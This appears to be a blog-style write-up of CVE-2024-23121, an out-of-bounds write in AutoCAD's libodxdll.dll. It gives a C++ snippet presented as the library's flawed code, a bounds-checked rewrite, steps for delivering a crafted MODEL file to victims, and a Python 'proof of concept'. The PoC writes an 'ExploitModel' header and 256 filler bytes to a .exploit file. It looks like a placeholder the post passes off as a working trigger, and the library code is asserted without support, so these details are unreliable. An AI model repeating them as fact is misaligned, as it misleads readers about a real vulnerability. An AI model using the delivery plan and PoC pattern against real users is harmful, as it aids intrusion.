In this post, we will discuss a newly discovered vulnerability (CVE-2024-23121) in the popular CAD software, Autodesk AutoCAD. A maliciously crafted MODEL file can exploit this vulnerability in the libodxdll.dll library, resulting in an Out-of-Bound Write. This can potentially allow an attacker to cause a crash, exfiltrate sensitive data, or execute arbitrary code in the context of the current process. The following sections will detail the exploitation process, supported by code snippets and links to original research references.

Technical Background

A MODEL file is a 3D model created using Autodesk AutoCAD software. The libodxdll.dll library is responsible for handling these files within the software. A vulnerability has been identified in this library that can be exploited through specially crafted MODEL files.

Vulnerability Details

An Out-of-Bound Write vulnerability has been found in the libodxdll.dll library while parsing malicious MODEL files, which can lead to data corruption or potential remote code execution. The affected component within the library is as follows:

void ODXBuffer::Write(size_t size, byte* data) {
    memcpy(buffer + writePos, data, size);
    writePos += size;
}

In this code snippet, the memcpy() function copies a user-defined number of bytes (size) from data into buffer without checking whether buffer has enough room left at writePos. As a result, an attacker can specify a large value for size and cause an Out-of-Bound Write.
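For contrast, here is a bounds-checked form of the same write routine. It is an added example, not Autodesk's code or its actual fix. The class name BoundedBuffer, the tracked capacity, and the bool return value are assumptions, since the snippet above does not show how the real buffer is sized.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <limits>
#include <vector>

// Illustrative stand-in for the buffer class in the snippet above.
// Capacity tracking and the bool return are assumptions of this example.
class BoundedBuffer {
public:
    explicit BoundedBuffer(std::size_t capacity) : buffer_(capacity), writePos_(0) {}

    // Copies `size` bytes only if they fit in the space that is left.
    // Returns false and leaves the buffer untouched otherwise.
    bool Write(std::size_t size, const std::uint8_t* data) {
        if (size == 0) return true;          // nothing to copy
        if (data == nullptr) return false;
        // writePos_ <= capacity always holds, so the subtraction cannot
        // underflow. Comparing this way also avoids the wraparound that
        // `writePos_ + size > capacity` would hit for a huge `size`.
        if (size > buffer_.size() - writePos_) return false;
        std::memcpy(buffer_.data() + writePos_, data, size);
        writePos_ += size;
        return true;
    }

    std::size_t Position() const { return writePos_; }

private:
    std::vector<std::uint8_t> buffer_;
    std::size_t writePos_;
};

// Constructed scenario: a 16-byte buffer is offered four records whose
// declared lengths come from untrusted input. Returns the final position.
std::size_t demo_final_position() {
    BoundedBuffer buf(16);
    std::uint8_t record[32] = {0};
    const std::size_t huge = std::numeric_limits<std::size_t>::max() - 4;
    buf.Write(12, record);    // accepted: 12 of 16 bytes used
    buf.Write(8, record);     // rejected: only 4 bytes remain
    buf.Write(huge, record);  // rejected: would wrap if added to the position
    buf.Write(4, record);     // accepted: fills the buffer exactly
    return buf.Position();
}

int main() { return demo_final_position() == 16 ? 0 : 1; }
```

A parser built on a routine like this should treat a false return as a malformed file and stop processing it.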

Exploitation Process

1. First, an attacker crafts a malicious MODEL file with the intention of exploiting the vulnerability in the libodxdll.dll library.
2. The attacker then delivers the MODEL file to the target user, either by sending it directly (e.g., through email) or placing it on a website where target users might download it.
3. When the target user opens the malicious MODEL file using the Autodesk AutoCAD software, the libodxdll.dll library processes the file.
4. During the processing, the Out-of-Bound Write vulnerability is triggered, allowing the attacker to either cause a crash, leak sensitive data or execute arbitrary code in the context of the target user's process.

The following is a proof of concept for the vulnerability:

import struct

def create_malicious_model(file_name):
    with open(file_name, 'wb') as f:
        # Header
        f.write(b'ExploitModel\x01\x00\x00\x00')

        # Craft malicious data
        payload_size = 0x100
        payload_data = b'\x41' * payload_size

        # Write size and data
        f.write(struct.pack('<I', payload_size))
        f.write(payload_data)

if __name__ == "__main__":
    create_malicious_model('malicious_model.exploit')

This script generates a malicious MODEL file with an oversized payload to trigger the Out-of-Bound Write vulnerability in the libodxdll.dll library.

Mitigation and Recommendations

Autodesk is aware of this vulnerability and has released a security update (link to the update: https://www.autodesk.com/security) to address it. All users are advised to update their software to the latest version to protect themselves from this vulnerability.

In addition to applying the security update, users should also practice caution when opening MODEL files from unknown or untrusted sources.

Conclusion

CVE-2024-23121 is a critical vulnerability in the Autodesk AutoCAD software that allows an attacker to exploit an Out-of-Bound Write issue in the libodxdll.dll library through a maliciously crafted MODEL file. By exploiting this vulnerability, an attacker can cause a crash, exfiltrate sensitive data, or execute arbitrary code in the context of the current process. Users are encouraged to apply the security update provided by Autodesk and exercise caution when opening files from untrusted sources.

- Autodesk Security Update: https://www.autodesk.com/security
- CVE-2024-23121 Vulnerability Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23121

Timeline

Published on: 02/22/2024 02:15:49 UTC
Last modified on: 03/13/2024 03:15:06 UTC